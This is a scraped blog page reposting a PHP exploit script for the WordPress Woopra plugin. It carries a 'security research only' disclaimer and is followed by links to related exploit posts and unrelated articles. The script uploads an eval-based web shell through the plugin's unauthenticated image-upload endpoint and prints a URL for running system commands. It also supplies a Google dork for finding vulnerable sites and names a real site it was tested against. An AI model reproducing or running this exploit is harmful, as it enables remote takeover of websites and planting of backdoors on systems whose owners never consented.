WordPress Woopra plugin remote PHP arbitrary code execution exploit.
测试方法:
提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
- # Exploit Title: woopra plugins execute arbitrary PHP code Exploit
- # Google Dork: inurl:/plugins/woopra/inc/php-ofc-library , inurl:wp-content/plugins/woopra/inc/
- # Date: [06-10-2013]
- # Exploit Author: wantexz
- # Vendor Homepage:wordpress.org/plugins/woopra/
- # Software Link: wordpress.org/plugins/woopra
- # Version: woopra
- # Tested on: [wantexz]
- # CVE :
- # target tested: http://zainhd.com/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php
- ############################################################################################
- # INDONESIANCODER
- # by
- # WANTEXZ
- #
- ############################################################################################
- <?php
- # woopra plugins ~ Exploit
- # http://indonesiancoder.com/
- #
- echo <<<EOT
- # -----------------------------------
- #/ woopra ~ Exploit \
- #\ Author: wantexz /
- # -----------------------------------
- ################################################################################################
- # Author: WANTEXZ
- #
- # thank to : tukulesto,arianom,cimpli,jack_jahat,k4L0NG666,Br3NG0S,Xr0b0t,blie,KaMtiEz,Mboys
- # all indonesian coder, indonesian defacer, kill-9
- ,jatimcom , malangcyber
- #
- ################################################################################################
- EOT;
- $options = getopt('u:f:');
- if(!isset($options['u'], $options['f']))
- die("\n Usage example: php IDC.php -u http://target.com/ -f shell.php\n
- -u http://target.com/ The full path to Joomla!
- -f shell.php The name of the file to create.\n");
- $url = $options['u'];
- $file = $options['f'];
- $shell ="{$url}//wp-content/plugins/woopra/inc/tmp-upload-images/{$file}";
- $url ="{$url}/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php?name={$file}";
- $data ="<?php eval(\$_GET['cmd']); ?>";
- $headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64;
- rv:15.0) Gecko/20100101 Firefox/15.0.1',
- 'Content-Type: text/plain');
- echo " [+] Submitting request to: {$options['u']}\n";
- $handle = curl_init();
- curl_setopt($handle, CURLOPT_URL, $url);
- curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
- curl_setopt($handle, CURLOPT_POSTFIELDS, $data);
- curl_setopt($handle, CURLOPT_RETURNTRANSFER,true);
- $source = curl_exec($handle);
- curl_close($handle);
- if(!strpos($source,'Undefined variable: HTTP_RAW_POST_DATA')&&
- @fopen($shell,'r'))
- {
- echo " [+] Exploit completed successfully!\n";
- echo " ______________________________________________\n\n
- {$shell}?cmd=system('id');\n";
- }
- else
- {
- die(" [+] Exploit was unsuccessful.\n");
- }
- ?>
WordPress Woopra plugin remote PHP arbitrary code execution exploit.的更多相关文章
- Apache / PHP 5.x Remote Code Execution Exploit
测试方法: 本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! /* Apache Magica by Kingcope */ /* gcc apache-magika.c -o ...
- DayuCMS 1.525 /include/global.func.php Foreground Arbitrary Code Execution
catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 Relevant Link: http://joychou.org/in ...
- [EXP]Microsoft Windows CONTACT - Remote Code Execution
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3 ...
- CVE-2014-6321 && MS14-066 Microsoft Schannel Remote Code Execution Vulnerability Analysis
目录 . 漏洞的起因 . 漏洞原理分析 . 漏洞的影响范围 . 漏洞的利用场景 . 漏洞的POC.测试方法 . 漏洞的修复Patch情况 . 如何避免此类漏洞继续出现 1. 漏洞的起因 这次的CVE和 ...
- Insecure default in Elasticsearch enables remote code execution
Elasticsearch has a flaw in its default configuration which makes it possible for any webpage to exe ...
- [EXP]Microsoft Windows MSHTML Engine - "Edit" Remote Code Execution
# Exploit Title: Microsoft Windows (CVE-2019-0541) MSHTML Engine "Edit" Remote Code Execut ...
- MyBB \inc\class_core.php <= 1.8.2 unset_globals() Function Bypass and Remote Code Execution(Reverse Shell Exploit) Vulnerability
catalogue . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 MyBB's unset_globals() function ca ...
- Roundcube 1.2.2 - Remote Code Execution
本文简要记述一下Roundcube 1.2.2远程代码执行漏洞的复现过程. 漏洞利用条件 Roundcube必须配置成使用PHP的mail()函数(如果没有指定SMTP,则是默认开启) PHP的mai ...
- [EXP]Apache Superset < 0.23 - Remote Code Execution
# Exploit Title: Apache Superset < 0.23 - Remote Code Execution # Date: 2018-05-17 # Exploit Auth ...
随机推荐
- Java_LIST使用方法和四种遍历arrayList方法
1.List接口提供的适合于自身的常用方法均与索引有关,这是因为List集合为列表类型,以线性方式存储对象,可以通过对象的索引操作对象. List接口的常用实现类有ArrayList和Linked ...
- jQuery动态效果实例
jQuery常见的动态效果: 隐藏/显示效果: 1.(1):隐藏,显示:通过 jQuery,使用 hide() 和 show() 方法可以用来隐藏和显示 HTML 元素. (2):隐藏/显示的速度: ...
- 在ARM Linux 使用 Valgrind
Linux valgrind 移植到ARM-Linux 一.Cross-Compile/交叉编译 (1)下载及解压Valgrind-3.11 (2)修改confirure 将armv7*)修改为ar ...
- Codevs 1064 虫食算 2004年NOIP全国联赛提高组
1064 虫食算 2004年NOIP全国联赛提高组 时间限制: 2 s 空间限制: 128000 KB 题目等级 : 钻石 Diamond 题目描述 Description 所谓虫食算,就是原先的算式 ...
- Codevs 4189 字典(字典树Trie)
4189 字典 时间限制: 1 s 空间限制: 256000 KB 题目等级 : 大师 Master 传送门 题目描述 Description 最经,skyzhong得到了一本好厉害的字典,这个字典里 ...
- 深度优化LNMP之Nginx (转)
深度优化LNMP之Nginx Nginx基本安全优化 1.调整参数隐藏Nginx版本号信息 一般来说,软件的漏洞都和版本有关,因此我们应尽量隐藏或清除Web服务队访问的用户显示各类敏感信息(例 ...
- gitlab ActionView::Template::Error (undefined method `[]' for nil:NilClass): 500错误
Started GET "/mygroup/myproject/tree/master/MyDirectory" for 127.0.0.1 at 2014-10-22 22:42 ...
- linux运维工程师,必须掌握以下几个工具
本人是linux运维工程师,对这方面有点心得,现在我说说要掌握哪方面的工具吧说到工具,在行外可以说是技能,在行内我们一般称为工具,就是运维必须要掌握的工具.我就大概列出这几方面,这样入门就基本没问题了 ...
- couchDB入门
无意翻到一本新书<CouchDB权威指南> 发现这就是传说中的NoSQL,看排第一的是mangodb,redis有些人说是,有些人说不是. CouchDB的开发很天才,直接可以通过java ...
- 【转】PL/SQL Developer使用技巧、快捷键
原文链接:PL/SQL Developer使用技巧.快捷键 1.类SQL PLUS窗口:File->New->Command Window,这个类似于oracle的客户端工具sql plu ...